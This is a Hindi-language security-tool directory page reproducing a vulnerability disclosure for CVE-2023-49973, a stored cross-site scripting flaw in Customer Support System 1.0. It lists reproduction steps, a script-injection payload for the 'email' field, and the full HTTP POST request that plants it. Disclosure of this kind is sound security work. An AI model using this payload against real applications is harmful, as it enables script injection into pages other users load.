Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-49973 — ग्राहक सहायता प्रणाली 1.0 - "customer_list" पृष्ठ पर "ईमेल" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता | Kitploit
उपकरण/GitHubGitHub/geraldoalcantara/cve-2023-49973
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubgeraldoalcantara/cve-2023-49973

CVE-2023-49973

ग्राहक सहायता प्रणाली 1.0 - "customer_list" पृष्ठ पर "ईमेल" फ़ील्ड/पैरामीटर में क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-49973

Customer Support System 1.0 - क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता "email" फ़ील्ड/पैरामीटर में "customer_list" पेज पर

विवरण: कस्टमर सपोर्ट सिस्टम 1.0 संग्रहीत XSS के लिए संवेदनशील है। कस्टमर सपोर्ट सिस्टम के संस्करण 1 में एक XSS भेद्यता मौजूद है। एक दुर्भावनापूर्ण अभिनेता "email" फ़ील्ड/पैरामीटर के माध्यम से JavaScript कोड सम्मिलित कर सकता है जब ग्राहक को संपादित/बनाया जा रहा हो। जब भी पृष्ठ "/customer_support/index.php?page=customer_list" पर जाया जाता है तो कोड निष्पादित होता है।

संवेदनशील उत्पाद संस्करण: कस्टमर सपोर्ट सिस्टम 1.0 CVE लेखक: Geraldo Alcântara दिनांक: 28/11/2023 पुष्टिकृत: 19/12/2023 CVE: CVE-2023-49973 परीक्षित: Windows

पुनरुत्पादन के चरण:

  1. एप्लिकेशन में लॉग इन करें।
  2. किसी मौजूदा ग्राहक को संपादित करने के लिए "/customer_support/index.php?page=customer_list" पर जाएं या नया ग्राहक बनाने के लिए "/customer_support/index.php?page=new_customer" पर जाएं।
  3. ग्राहक बनाएं या संपादित करें और दुर्भावनापूर्ण पेलोड को "email" फ़ील्ड/पैरामीटर में डालें।
  4. पेलोड:
root@kitploit:~
</dt></b><script>alert(document.domain)</script>

अनुरोध:

root@kitploit:~
POST /customer_support/ajax.php?action=save_customer HTTP/1.1
Host: 192.168.68.148
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------212391604122778812451614149575
Content-Length: 1149
Origin: http://192.168.68.148
Connection: close
Referer: http://192.168.68.148/customer_support/index.php?page=new_customer
Cookie: csrftoken=1hWW6JE5vLFhJv2y8LwgL3WNPbPJ3J2WAX9F2U0Fd5H5t6DSztkJWD4nWFrbF8ko; sessionid=xrn1sshbol1vipddxsijmgkdp2q4qdgq; PHPSESSID=abige9ar0b1bi3qcf9mkv258o3

-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="id"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="firstname"

teste
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="middlename"


-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="lastname"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="contact"

210
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="address"

asdasd
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="email"

</dt></b><script>alert(document.domain)</script>
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="password"

xss
-----------------------------212391604122778812451614149575
Content-Disposition: form-data; name="cpass"

xss
-----------------------------212391604122778812451614149575--

खोजकर्ता/श्रेय: Geraldo Alcântara

टूल डाउनलोड करें